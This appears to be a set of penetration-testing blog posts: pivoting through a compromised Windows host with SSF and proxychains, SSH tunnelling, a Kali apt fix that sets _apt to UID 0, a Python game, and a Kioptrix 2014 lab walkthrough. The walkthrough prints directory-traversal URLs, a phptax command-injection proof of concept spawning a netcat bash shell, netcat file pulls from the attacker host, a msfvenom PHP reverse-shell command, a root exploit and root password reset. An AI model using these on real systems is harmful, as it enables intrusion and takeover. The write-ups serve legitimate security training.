Pivoting on Windows – Secure Socket Funneling

Scenario

We’ve just compromised a Windows host. After enumerating it and grabbing any credentials/hashes we can, we discover that the host is multi-homed (i.e. it is a member of another network segment). A quick ipconfig confirms there are indeed 2 networks that this host is a member of.

[image: multi-homed-ipconfig]

The question is: how do we now start to explore this other network? We have a number of choices:

  1. Upload some tools to the host and then scan and enumerate the other network from there.
  2. Use what is already on the host (‘living off the land’): PowerShell scripts to ping sweep, port scan, etc.
  3. Use pivoting to proxy the tools we already have on our attack box through the Windows host to enumerate the other network.

In this post we shall explore the pivoting method, as we can use all our existing tools already available.

Enter the hideously easy tool: SSF, or Secure Socket Funneling.

[image: ssf_logo]

I stumbled upon SSF on an engagement while hopelessly trying to get plink working on a Windows host. It was easy to set up and worked out of the box. Below I’ll go through a working example.

Setup

In this diagram the machine with the red monitor is our multi-homed box on 2 networks (192.168.56.110/24 & 10.20.0.10/24). The attacking box is on the same 192.168.56 segment and the new network we are interested in is the 10.20.0.0/24 network. The box in red has two ip addresses, one for each segment.

[image: multi-homed]

SSF is freely available from here: https://securesocketfunneling.github.io/ssf/#home just download the platforms and architectures you are interested in. I just grabbed all of them, just in case 😉

SSF ships a number of files; we are interested in only two of them.

[image: ssf-binaries]

ssfd.exe: the server end of this setup; this one runs on the multi-homed Windows host.
ssf(.exe): the client end; this one runs on your attacking box.

Note: all commands are run from a command prompt: PowerShell or CMD.exe on Windows, bash on Linux.

Below we have the server portion running on the Windows box in PowerShell.

> ssfd.exe -p 11111
-p listening port

[image: ssfd-win10]

And here is the client end in bash.

# ./ssf -D 22222 -p 11111 192.168.56.102
-D create a dynamic (SOCKS) proxy listening on this local port (22222, matching the proxychains entry below)
-p port the server (ssfd.exe) is listening on
the final argument is the ip address of the listening server.

[image: ssf-kali]

Note: the ip address in this image is wrong. 😉
As you can see the two ends create a tunnel and use the default certificates that came with the installation. Those defaults are identical in every SSF download and therefore provide no real authentication, so swap them out for your own.

For the final step in this setup we need one more tool: Proxychains.

ProxyChains is a UNIX program, that hooks network-related libc functions in dynamically linked programs via a preloaded DLL and redirects the connections through SOCKS4a/5 or HTTP proxies. (shamelessly stolen from the github page for proxychains.)

tl;dr: it forces TCP programs to send their traffic through an already configured proxy.

We edit the proxychains configuration file so that its last entry points at the SSF dynamic proxy. Output below:

tail /etc/proxychains.conf

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 22222

There are no services to restart with proxychains, so we can move straight on to the fun part!

# proxychains nmap -sT -Pn -sV --top-ports=10 10.20.0.100
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-27 00:45 BST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:25-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:445-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:443-<--denied
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:139-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:80-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:23-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:21-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:3389-<--denied
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:22-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:110-<--denied
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:21-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:22-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:23-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:25-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:80-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:139-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:445-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:139-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:80-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:80-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:80-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:80-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:80-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:80-<><>-OK
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:80-<><>-OK
Nmap scan report for 10.20.0.100
Host is up (0.072s latency).

PORT     STATE  SERVICE       VERSION
21/tcp   open   ftp           vsftpd 2.3.4
22/tcp   open   ssh           OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open   telnet        Linux telnetd
25/tcp   open   smtp          Postfix smtpd
80/tcp   open   http          Apache httpd 2.2.8 ((Ubuntu) DAV/2)
110/tcp  closed pop3
139/tcp  open   netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp  closed https
445/tcp  open   netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3389/tcp closed ms-wbt-server
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.28 seconds

Important notes! With nmap you need to use -Pn and -sT: proxychains only hooks the libc connect() calls of dynamically linked programs, so a half-open (SYN) scan, which crafts raw packets, never goes through the proxy. The host-discovery probes nmap sends by default are raw packets too, so nmap will fail unless you tell it not to ping the target first.
Of course you can use pretty much any program with proxychains, for example:

proxychains ftp 10.20.0.100
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:21-<><>-OK
Connected to 10.20.0.100.
220 (vsFTPd 2.3.4)
Name (10.20.0.100:root):
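The |S-chain| lines in the output above are proxychains reporting, for every connection, the SOCKS4 CONNECT request it sent to the ssf dynamic proxy on 127.0.0.1:22222 and whether the far end granted it (reply code 90, shown as OK) or rejected it (code 91, shown as denied, which in this run simply means the target port was closed). The following Python is an added example, not code from the post, from SSF or from proxychains: it encodes and decodes that handshake (including the SOCKS4a form, where the far end resolves the hostname) and parses proxychains’ own output lines into the open-port list that nmap then reported. The sample lines are copied from the run above.

```python
import ipaddress
import re
import struct

# SOCKS4 wire-format constants (from the original SOCKS4/4a protocol description)
SOCKS4_VERSION = 4
CMD_CONNECT = 1
REPLY_GRANTED = 90        # proxychains renders this as "-<><>-OK"
REPLY_REJECTED = 91       # proxychains renders this as "-<--denied"


def build_socks4_connect(dest_ip: str, dest_port: int, userid: str = "") -> bytes:
    """Encode the CONNECT request proxychains sends to the dynamic proxy.

    Layout: VN(1) CD(1) DSTPORT(2, big-endian) DSTIP(4) USERID(variable) NULL(1)
    """
    if not 0 < dest_port < 65536:
        raise ValueError("port out of range")
    packed_ip = ipaddress.IPv4Address(dest_ip).packed
    return (struct.pack("!BBH", SOCKS4_VERSION, CMD_CONNECT, dest_port)
            + packed_ip + userid.encode("ascii") + b"\x00")


def build_socks4a_connect(hostname: str, dest_port: int, userid: str = "") -> bytes:
    """SOCKS4a variant: DSTIP is 0.0.0.x and the hostname follows the userid,
    so the name is resolved by the proxy, i.e. from the far end of the tunnel."""
    return (struct.pack("!BBH", SOCKS4_VERSION, CMD_CONNECT, dest_port)
            + b"\x00\x00\x00\x01" + userid.encode("ascii") + b"\x00"
            + hostname.encode("ascii") + b"\x00")


def parse_socks4_reply(data: bytes) -> dict:
    """Decode the fixed 8-byte reply: VN(1, always 0) CD(1) DSTPORT(2) DSTIP(4)."""
    if len(data) < 8:
        raise ValueError("short reply")
    vn, cd, port = struct.unpack("!BBH", data[:4])
    if vn != 0:
        raise ValueError("unexpected reply version %d" % vn)
    return {"code": cd, "granted": cd == REPLY_GRANTED,
            "port": port, "ip": str(ipaddress.IPv4Address(data[4:8]))}


def proxychains_status(reply: bytes) -> str:
    """Render a reply the way proxychains does at the end of its |S-chain| lines."""
    return "OK" if parse_socks4_reply(reply)["granted"] else "denied"


# The |S-chain| lines proxychains prints: proxy, then target:port, then the outcome
CHAIN_RE = re.compile(
    r"\|S-chain\|-<>-(?P<proxy>\S+?)-<><>-(?P<target>\d+\.\d+\.\d+\.\d+):(?P<port>\d+)"
    r"-(?P<status><><>-OK|<--denied)")


def parse_chain_line(line: str):
    """Return proxy, target, port and outcome from one |S-chain| line, or None."""
    m = CHAIN_RE.search(line)
    if not m:
        return None
    return {"proxy": m.group("proxy"), "target": m.group("target"),
            "port": int(m.group("port")), "ok": m.group("status").endswith("OK")}


def open_ports(lines) -> list:
    """Sorted list of distinct ports the proxy reported as reachable (CD=90)."""
    return sorted({r["port"] for r in map(parse_chain_line, lines) if r and r["ok"]})


# Sample lines copied from the proxychains/nmap run above (a subset, in the order printed)
SAMPLE_CHAIN = [
    "|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:25-<><>-OK",
    "|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:445-<><>-OK",
    "|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:443-<--denied",
    "|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:139-<><>-OK",
    "|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:80-<><>-OK",
    "|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:23-<><>-OK",
    "|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:21-<><>-OK",
    "|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:3389-<--denied",
    "|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:22-<><>-OK",
    "|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:110-<--denied",
    "|S-chain|-<>-127.0.0.1:22222-<><>-10.20.0.100:80-<><>-OK",
]

if __name__ == "__main__":
    print(build_socks4_connect("10.20.0.100", 445).hex())
    print(open_ports(SAMPLE_CHAIN))
```

Because the request carries a destination port and IP but no connection state, the proxy (here the ssfd end on the Windows host) is the side that actually opens the TCP connection; that is why every port probe shows up on the internal network as traffic originating from the multi-homed host, which is the pattern a defender would look for.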

Summary:
In this post we’ve set up a listening ssfd server on our multi-homed Windows host and connected to it with the ssf client from our attacking box. From there we used proxychains to send traffic down the proxy and out onto the Windows host’s other network segment, and in this case we used nmap to scan for open ports on just one host. But there is no reason we cannot scan the entire subnet, or even use tools such as nikto against any web servers we find.

Hope you enjoyed this post.

Have fun!

GRL_UK

SSH Tunnels

[image: putty]

PuTTY/ssh port forwarding!

Thought I’d create this post to remind myself and show my colleague and friend @Dark_KnightUK how to set up a secure tunnel with port forwarding using ssh, either with PuTTY on Windows or the normal ssh client on Linux/Unix/Windows (yes, Windows now has a native ssh client!). I shall walk through setting up both Windows and Linux clients to connect to a Windows desktop on my home network.

Why would you want to use ssh tunneling?

SSH tunnels are useful for securing traffic between 2 hosts that you would like to remain private. SSH itself is a secure shell replacement for Telnet as all traffic is encrypted rather than sent in clear across the network. This mechanism can also be used to bypass various restrictions on public or unknown networks providing your destination has a listening ssh server at the other end.

Reasons I use ssh tunnels:

1. Proxying Web requests via my own http proxy server.
2. Accessing resources in my home network, such as CCTV or mail system.
3. Being able to use RDP on my desktop at home securely.

What is a ssh tunnel?

An ssh tunnel is where you use an already established ssh connection to forward other traffic securely by specifying which ports need to be proxied. SSH tunnels are not as flexible as a full-grown VPN solution, as each port you want to forward needs to be specified individually on the command line or in the config (a VPN will pass traffic to any port once a connection has been made). But its ease of setup makes it an easy solution for simple things.

Setup

Firstly you need to set up your home router to port forward (sometimes called a service port) any requests it receives on a particular port of its public interface to an internal address that has a listening SSH server.

Public address: 45.11.22.33
Home SSH server address: 192.168.0.1 port 22 (default)
Home Windows desktop: 192.168.0.4 port 3389 (default)

[image: puttysshtunnel]

In this example my destination public address is 45.11.22.33 and I have set up the router to listen on port 1337 and forward any requests it gets to the internal address 192.168.0.1 port 22.
Note: you could use any port you wish, not just 1337 😉

SSHD supports tunnels by default; if not, check the sshd_config file for the clause ‘PermitTunnel’ and make sure it is commented out. (Strictly speaking, PermitTunnel governs tun(4) device tunnels created with ssh -w; the -L/-D port forwarding used here is governed by AllowTcpForwarding, which also defaults to yes.)

#PermitTunnel no

Working example:

I would like to connect to my Windows Desktop at home from work.

Using Windows Putty client:

Set up a normal connection to the public address and, before you hit Open, go to the SSH > Tunnels section of the client.

[image: putty-tunnel1] [image: putty-tunnel2]

Add 3390 in the source port box and 192.168.0.4:3389 as the destination, then hit Add. It should add the entry to the window above. (Note: I use 3390 as a service may already be using port 3389 on my local Windows machine; in this case it would be RDP services.)

Log in to ssh as normal; once in, all I need to do is fire up the Remote Desktop Client (mstsc) and connect to my local address (127.0.0.1) on the port specified.

[image: mstsc]

I should now be connected to my own machine.

Alternative method

The Spring update to Windows 10 provided a new native ssh client via Powershell:

ssh -p 1337 -L 3390:192.168.0.4:3389 me@45.11.22.33

This should do the same thing as putty but via Powershell instead. Now just use RDP client as above and you should have a desktop as well.

Linux version

Accessing RDP on a windows machine on my home network.

ssh -p 1337 me@45.11.22.33 -L 3390:192.168.0.4:3389

Connect to host 45.11.22.33 (on the router’s forwarded port 1337) with the username ‘me’ and forward (-L) local port 3390 to 192.168.0.4 port 3389. Easy.

Then just fire up your favourite RDP client (rdesktop or other), point it to your local address on port 3390, and you will now be connected to your own machine.

Conclusion:

There are many more ways to use ssh tunnels with both remote and local port forwarding. This method is the one I find the most useful. Hope this has been clear for you all. Some of these concepts can mess with your head.

Have fun!

Nethunter apt issue resolving http.kali.org

Been a while since I fired up my Nethunter tablet; it’s such a great form factor, small and portable. It has not been used in anger yet, but I do like to keep all my devices updated, especially with the latest version of exploit-db fresh from the Kali repos 🙂

Unfortunately that task failed. :-/

Issue: Apt fails to resolve http.kali.org, error below.

root@kali:~# apt-get update
Err:1 http://http.kali.org/kali kali-rolling InRelease
Temporary failure resolving 'http.kali.org'
Reading package lists... Done
W: Failed to fetch http://http.kali.org/kali/dists/kali-rolling/InRelease Temporary failure resolving 'http.kali.org'
W: Some index files failed to download. They have been ignored, or old ones used instead.

I did the standard checks: /etc/resolv.conf to see if I was missing any DNS servers, then the /etc/hosts file in case anything weird was stopping the resolver from trying DNS. All looked normal.

Other things such as dig and apps such as Firefox were behaving normally. This meant it was not a networking issue or a real system-wide resolver issue; it was unique to apt.

Solution:

A web search provided the following check and fix.

grep 'apt' /etc/passwd
_apt:x:114:65534::/nonexistent:/bin/false

Update the ‘_apt’ UID to 0

_apt:x:0:65534::/nonexistent:/bin/false

/etc/passwd format:
username:password:UID:GID:user info:Home dir:command shell
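The fix above leaves the system with two UID-0 accounts, which is exactly the kind of change a routine account audit should surface. As an added example (not code from the post), the following Python parses the passwd format described above and reports root-equivalent accounts, empty password fields and shared UIDs; the sample entries are constructed, with the _apt line as the workaround leaves it.

```python
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class PasswdEntry:
    name: str
    password: str   # "x" means the hash lives in /etc/shadow; "" means no password at all
    uid: int
    gid: int
    gecos: str      # the "user info" field
    home: str
    shell: str


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Parse passwd-format text: username:password:UID:GID:user info:home dir:shell."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, password, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, password, int(uid), int(gid), gecos, home, shell))
    return entries


def uid0_accounts(entries: List[PasswdEntry]) -> List[str]:
    """Every account the kernel will treat as root, in file order."""
    return [e.name for e in entries if e.uid == 0]


def audit(entries: List[PasswdEntry]) -> List[str]:
    """Findings a reviewer wants to see: extra UID-0 accounts, empty passwords, shared UIDs."""
    findings = []
    for name in uid0_accounts(entries):
        if name != "root":
            findings.append(f"{name}: UID 0 (root-equivalent account)")
    for e in entries:
        if e.password == "":
            findings.append(f"{e.name}: empty password field")
    by_uid: Dict[int, List[str]] = {}
    for e in entries:
        by_uid.setdefault(e.uid, []).append(e.name)
    for uid, names in by_uid.items():
        if uid != 0 and len(names) > 1:
            findings.append(f"UID {uid} shared by {', '.join(names)}")
    return findings


# Constructed sample: a normal root entry, a system account, the _apt line as
# left by the workaround above (UID 114 changed to 0), and an ordinary user
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
_apt:x:0:65534::/nonexistent:/bin/false
grl:x:1000:1000:GRL,,,:/home/grl:/bin/bash
"""

if __name__ == "__main__":
    for finding in audit(parse_passwd(SAMPLE_PASSWD)):
        print(finding)
```

Run against a real file with `audit(parse_passwd(open("/etc/passwd").read()))`; on the tablet after the workaround it would list _apt as a second root-equivalent account, which is the trade-off the workaround makes.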

Related Bug: apt-get errors

Explanation (sort of): it seems the user _apt had issues using the resolver; updating the UID made things work. There is no real explanation in the bug report other than that it was fixed in later releases. Bear in mind that _apt is the unprivileged account apt drops to when fetching packages, so giving it UID 0 removes that privilege separation; treat it as a workaround until the fixed release arrives.

Note: the permissions on /etc/resolv.conf were set to -rw------- (owner read/write only), but updating these so users could read the file did not fix this. So the original fix above still stands.

Hope this helps someone.

 

Keeping skills sharp

This post is about maintaining skills you learn.

Skills can be lost as well as gained depending on how much we use them.

Python_rps

For example, at the beginning of my OSCP certification I decided to do a Python course as supplemental learning in addition to what was taught (exploit development, and crafting one or two custom tools for enumeration). It did help a lot and I enjoyed working with the language tremendously.

After passing the certification and carrying on with normal day-to-day work, the skills I picked up began to fade. I forgot basic things, mixing Python syntax with Bash’s. Now when I try to code something I’m looking things up and referencing old code; not a good place to be in.

The solution?

Find an excuse to use your skills in everyday tasks, or even give yourself exercises to do. I stumbled upon a website that suggests excellent fun projects to code, including simple games and other tools used to do specific tasks.

Here are a few fun Python exercise examples I decided to play with, the first of which is below:

  1. Rock paper scissors
  2. Number guessing game high low.
  3. Password / passphrase generator
  4. Fast network Ping tool

Rock paper scissors project:

My version, it probably needs more work but the basic functionality is there. Forgive the horrible lack of syntax highlighting.

#!/usr/bin/python3
import random
import sys

game_choice = ['Rock', 'Paper', 'Scissors']
# SystemRandom draws from the OS entropy source (os.urandom) instead of the
# predictable default generator, so the computer's pick cannot be guessed
secure_random = random.SystemRandom()


# Print the numbered list of options
def display_choices():
    print('Select one of the options')
    for pos, opt in enumerate(game_choice):
        print(pos, opt)


# Compare the computer's choice c with the user's choice u and print the result
def compare_choices(c, u):
    paprock = '\nPaper wraps Rock'
    scispap = '\nScissors cut Paper'
    rockscis = '\nRock blunts Scissors'
    lose = '\n---------------You lose!-----------'
    win = '\n~~~~~~~~~~~~~~~~You win!~~~~~~~~~~~~'
    if u == c:
        print("\nIt's a draw\n")
    # Losing section
    elif u == 'Rock' and c == 'Paper':
        print(paprock, lose)
    elif u == 'Paper' and c == 'Scissors':
        print(scispap, lose)
    elif u == 'Scissors' and c == 'Rock':
        print(rockscis, lose)
    # Winning section
    elif c == 'Scissors' and u == 'Rock':
        print(rockscis, win)
    elif c == 'Paper' and u == 'Scissors':
        print(scispap, win)
    elif c == 'Rock' and u == 'Paper':
        print(paprock, win)


# Main display loop: keep asking until the user enters 9
choice = -1
while choice != 9:
    display_choices()
    ans = input('Choose an option (0,1,2 or 9 to exit): ')
    # Reject anything that is not a listed option instead of crashing on int() or a bad index
    if not ans.isdigit() or int(ans) not in (0, 1, 2, 9):
        print('\nInvalid option, try again\n')
        continue
    choice = int(ans)
    if choice == 9:
        sys.exit()
    u_choice = game_choice[choice]
    c_choice = secure_random.choice(game_choice)
    compare_choices(c_choice, u_choice)
    print('\n')

Lots of improvements could be made, but it was a fun little project to do and I learned about random.SystemRandom(), so it was a learning experience too.

I have a few ideas for a tool I would like to code, so watch this space, as it were. I would encourage anyone to try this and keep their skills sharp. I shall be coding the rest of the list later on and will do small posts with my versions of them. Feel free to comment on how bad my coding is or any tips for improvement!

Thanks for reading and have fun.

GRL_UK

 

 

Vulnhub Practice: Kioptrix 2014

What is Vulnhub?

Vulnhub.com is a site dedicated to providing machines that you can download and practice compromising in a safe legal manner. Quoted from their website directly Vulnhub.com’s purpose:

To provide materials that allows anyone to gain practical ‘hands-on’ experience in digital security, computer software & network administration.

What does this mean? Well it means I can practice the skills I gained from the OSCP course and keep my tools sharp so to speak. We all know if you do not use something on a regular basis you forget things and lose your edge.

The machines listed in my previous blog (OSCP Prep) are the ones I shall be working my way through.

First on my list is Kioptrix 2014, the last of a series created by Stephen McElrea (Loneferret), who sadly passed away in July 2017.

Kioptrix 2014 is aimed at beginners so should be a nice fun one to start with.

Setup is straightforward: use VirtualBox (or VMware Player) as the hypervisor. Links here for what you may need:

https://www.vulnhub.com/entry/kioptrix-2014-5,62/
https://www.virtualbox.org/wiki/Downloads (Windows) – Linux users will have this in their chosen Linux package repo.

Most of the machines I play with are in VirtualBox, and this machine does work in VirtualBox, it just needs a little tweaking. There is a fix bzip archive available with this machine to enable it to run on VirtualBox. If you run VMware it should work just fine. If you follow the excellent instructions and screenshots it should not take you long to get this up and running. (I may do a write-up of the setup later.)


The Walk through:

Let’s start: Nmap needs to be run against this host to see what we are dealing with.

[image: Screenshot from 2017-12-17 15-12-14]

A simple Nmap scan reveals that there are only really 2 ports open. The scan also tells us this may be a FreeBSD Unix box running Apache (nothing is concrete until we can confirm via other methods), so we have some idea of the platform.

DirBuster is run against this host to see if there are any hidden directories; the tool doesn’t give us anything and errors out after a few minutes. Port 8080 is even quicker to error out.

As port 80 and 8080 are open and are web ports, we select another tool for scanning web systems. The Nikto web scanner is run to see if there are any obvious vulnerabilities we can exploit. (nikto -h http://192.168.56.101)

[image: Screenshot from 2017-12-17 15-55-00]

From this we  can see only 1 obvious vulnerability:
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.

A quick search with either searchsploit (courtesy of Kali Linux) or exploit-db shows 2 potential exploits:
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | exploits/unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow | exploits/unix/remote/764.c

Both of these however do not cover the combination of Apache and FreeBSD we have, so without some more exploit development on the system itself we can’t use this.

nikto on port 8080 is pretty much the same as the port 80 scan.

When you try and browse the page you are greeted with a Forbidden page. Dead end for now.

Looking back at the main page on port 80 we see the default ‘It works’ page, pretty standard. The source code however (as we are a curious type) yields this little gem of information:

[image: 80-source-pchart]

A quick check of searchsploit or exploit-db reveals 2 vulnerabilities, one directory traversal issue and an XSS one. Let’s have a look at the directory traversal issue.


"hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd"

So, converted into a real-world request, let’s see if we can grab the /etc/passwd file as a test.

[image: dirtrav-passwd]

Now that we know that works, let’s do some more enumeration and get more information on this host. As we got the Apache forbidden page we’ll try to find where the config is and take a look at what we are dealing with. Firstly we need to know where the config file lives; a little googling gives us the path.


http://192.168.1.54/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

[image: apache-config]

The config reveals the 8080 site is looking for a specific user agent: Mozilla/4. One way round this is a user agent switcher. Most modern browsers have plenty of extensions and plug-ins; we just need one that lets us present a different user agent string to the web server. ‘User Agent Overrider’ was selected (realistically any one could be used). The custom string was set to: Mozilla/4.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3

Now when we browse the site on 8080 we get a different page. Our browser meets the criteria needed to see the page. Result below.

[image: user-agent-phptax]

Following this obvious link.

This reveals a hidden page and gives us something to enumerate more.

[image: phptax]

Searching searchsploit/exploit-db for phptax, we find 3 possible exploits: one Metasploit module and 2 manual ones. The manual ones list an RCE PoC:

PoC: http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

Firstly,  the Metasploit way. Searching for phptax yields one exploit exploit/multi/http/phptax_exec, we set the options of RHOSTS and RPORT and then run the exploit. This gets us a very basic shell. First thought, can we improve the shell? No in this case, I’ve not managed to find a way, but I shall keep researching and update you all when I do get some answers.

So, we have a shell; from here it’s more enumeration to see what we have and what is available to us. From the screenshots we have the same id as the Apache web service. The present working directory (pwd) is /usr/local/www/apache22/data2/phptax.

[image: msf-exploit-phptax]

uname -a : FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64

Through enumeration we confirm the platform and find the version of the kernel and that we have access to netcat. (Which will be handy for transferring files later.)

Searching again we find 3 privilege escalation exploits, one of them a Metasploit version. With our basic shell we cannot run the Metasploit exploit without first improving the shell; Meterpreter would be the ideal improvement. We have 2 choices:

  1. Concentrate on getting a Meterpreter shell
  2. Carry on and get privilege escalation to a root shell?

Privilege Escalation

Root access is the end result, so let’s have a look at getting that. We can look at getting a Meterpreter shell afterwards, which if things go to plan will be root privileged.

We know the system is a FreeBSD and we know the version is 9.0. Checking these strings with searchsploit for a privilege escalation exploit gets us 3 results:

[image: searchsploit-priv]

FreeBSD 9.0 – Intel SYSRET Kernel Privilege Escalation 

$ searchsploit -m 28718

As we cannot use the Metasploit version yet, we shall try the next one. (Sometimes it takes a lot of trial and error to find the correct exploit.) We can use netcat to transfer the source code to the Kioptrix box using the following commands:

Attacking box: nc -nvlp 1337 < priv-28718.c

Kioptrix: nc -nv 192.168.56.1 1337 >> priv.c

We have the target connect out as the client, as the server may have inbound ports blocked by a firewall we have not encountered yet.

Once transferred we need gcc to compile the exploit. Luckily gcc is installed. (If it were not, we could replicate the environment in a local VM or lab and copy the binary over.)

gcc priv.c -o priv
./priv

Once compiled we execute it, will it work?

./priv
[+] SYSRET FUCKUP!!
[+] Start Engine…
[+] Crotz…
[+] Crotz…
[+] Crotz…
[+] Woohoo!!!
id
uid=0(root) gid=0(wheel) groups=0(wheel)

We have root! 🙂
OK now we have a look for the congrats.txt file that the author kindly put into place for us.

Is this the end? Have we finished?

Well not for me, I prefer to get better access. More direct.

SSH was not enabled, but seeing as we are root we can have a look at enabling it. A little more googling gave me information on how to enable and start the sshd service.


echo 'sshd_enable="YES"' >> /etc/rc.conf
service sshd onestart

While we are at it, we can either create a new account or just reset the root password with the passwd command.

echo "lamepassword1" | pw usermod root -h 0

If we were going to use this box as a way into a network we would create another account and copy off the relevant files to crack any accounts for use later.

Then it is trivial to ssh into the box and use the front door.

[image: kioptrix-message]

Alternative methods.

Though I am happy to use Metasploit to gain access to this box I prefer to find other ways to manually gain a shell.

Seeing as the sites are predominantly PHP, it would seem logical to see if we can leverage that.

The following is a common technique against web servers that allow command execution: use the injection to pull a PHP file onto the server.

Using the phptax exploit we can do this:

http://192.168.56.101:8080/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-nv%20192.168.56.1%201337%20%3E%3E%20shell2.php%20;&pdf=make

Which translates to: nc -nv 192.168.56.1 1337 >> shell2.php

Attacker box: nc -nvlp 1337 < shell2.php

cat shell2.php

[image: php-cmd]

Once this file is transferred we can now call the page and run off commands that are helpfully output to the page.

[image: shell2-php]

We can use this to further enumerate the host to the extent of how much access the user running Apache can do.

Using this same method of transfer we can also upload a php Meterpreter payload.

msfvenom is used to generate a php reverse tcp Meterpreter payload:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=1337 -f raw > met_php.php

Then we simply upload it to the server.

http://192.168.56.101:8080/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-nv%20192.168.56.1%201337%20%3E%3E%20met_shell.php%20;&pdf=make

Before we trigger the payload we need to set up the multi/handler listener within Metasploit and make sure it matches our msfvenom generated payload.

[image: Screenshot from 2017-12-17 11-07-59]

All we need to do is browse to the URL to trigger the payload.

As you can see we now have our Meterpreter shell. From this we have access to all the modules and post exploits. We can spawn a shell from here and carry on with the privilege escalation to get root.

Other methods?

Another method is to upload a reverse PHP shell from pentestmonkey. I’ve not tried this, but other walk-throughs suggest favourable results.

Mitigation?

Patching, as you are probably aware will fix the majority of security holes outside of configuration issues. We would make sure all the software was up to date, vulnerabilities would/should be patched on phptax and pChart. If no patches are available we’d logically migrate away from vulnerable software or place more security barriers in place. Operating system security updates would also need to be installed. FreeBSD version 9 reached End of Life March 2013 so it would be advisable to retire the entire server.

The server does have some security, note from the author:

For fun, I installed “OSSEC-HIDS” and monitored a few things.
Default settings, nothing fancy but it should’ve logged a few of your attacks. Look
at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified files in 2 specific folders.

The OSSEC-HIDS alert log and the folderMonitor log file added by the author display all our attempts and even include the Meterpreter PHP payload.

[image: ossec]

Finally the author leaves us with the final PS in his message.

p.s.: Keep in mind, for each “web attack” detected by OSSEC-HIDS, by
default it would’ve blocked your IP (both in hosts.allow & Firewall) for
